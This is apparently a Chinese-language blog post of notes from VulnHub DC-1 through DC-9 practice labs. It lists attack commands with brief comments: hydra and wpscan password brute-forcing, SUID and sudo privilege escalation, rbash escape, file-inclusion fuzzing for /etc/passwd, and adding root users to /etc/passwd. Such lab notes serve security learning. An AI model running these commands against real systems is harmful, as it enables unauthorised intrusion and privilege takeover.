- DC-1
- nmap -sC -sV -v -p- -A 192.168.192.129
- python -c "import pty;pty.spawn('/bin/bash')"使用交互shell
- find / -user root -perm -4000 -print 2>/dev/null SUIDt提权
注:1.Nmap/Vim/find/Bash/More/Less/Nano/cp这几个是已知的可用来提权的linux可执行的文件 - hydra -l flag4 -P /usr/share/john/password.lst 192.168.0.103 ssh -vV -f
- -l指定用户名
- -P指定密码字典文件
- -vV爆破一次在终端打印一行
- -f成功爆破密码后,停止爆破
- -P指定密码文件
- -p指定密码
- https://www.exploit-db.com/exploits
- DC-2
- C:\Windows\System32\drivers\etc\hosts
/etc/hosts 本地DNS位置 - dirb 192.168.0.131 目录爆破
- cewl http://dc-2 -w dict.txt 利用cewl生成字典
- wpscan --url http://dc-2 --enumerate u 针对wp进行用户名枚举
wpscan --url http://dc-2 --usernames 'admin,jerry,tom' --passwords dict.txt 配和之前的进行爆破 - ssh tom@192.168.0.131 -p 7744
- BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin
echo /* rbash逃逸 - sudo -l
- sudo git -p --help git提权
- C:\Windows\System32\drivers\etc\hosts
- DC-4
- $ echo "admin::0:0:::/bin/sh" | sudo teehee -a /etc/passwd 建立用户
- hydra -l admin -P /usr/share/john/password.lst -f 192.168.0.151 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" 九头蛇post爆破
- DC-5
- wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.0.100/thankyou.php?FUZZ=/etc/passwd wfuzz文件包含参数测试
- find / -perm -4000 -user root 2>/dev/null 查看一下有什么可以提权的文件
- kali上 nc -lvp 5555 < rootshell 在靶机上
nc 192.168.0.103 5555 > rootshell,传完kali,ctal+c断开连接下一个 nc传文件 - whatweb -v 192.168.0.100 信息收集
- DC-6
- echo 'os.execute("/bin/bash")' > shell
sudo nmap --script=shell nmap提权
- echo 'os.execute("/bin/bash")' > shell
- DC-7
- drush user-password admin --password="123" drush改密码
- DC-8
- searchsploit exim 查找exp
- DC-9
- knockd保护ssh服务,破解
- openssl passwd -1 -salt root1 666
root1:$1$root1$XWBhesw1wJPdUdB54.rhA.:0:0::/root:/bin/bash
echo 'root1:$1$root1$XWBhesw1wJPdUdB54.rhA.:0:0::/root:/bin/bash' > /tmp/pass
sudo /opt/devstuff/dist/test/test /tmp/pass /etc/passwd 伪root用户建立
vulnhub收获总结
发布于 2022-03-05 1490 次阅读
Comments NOTHING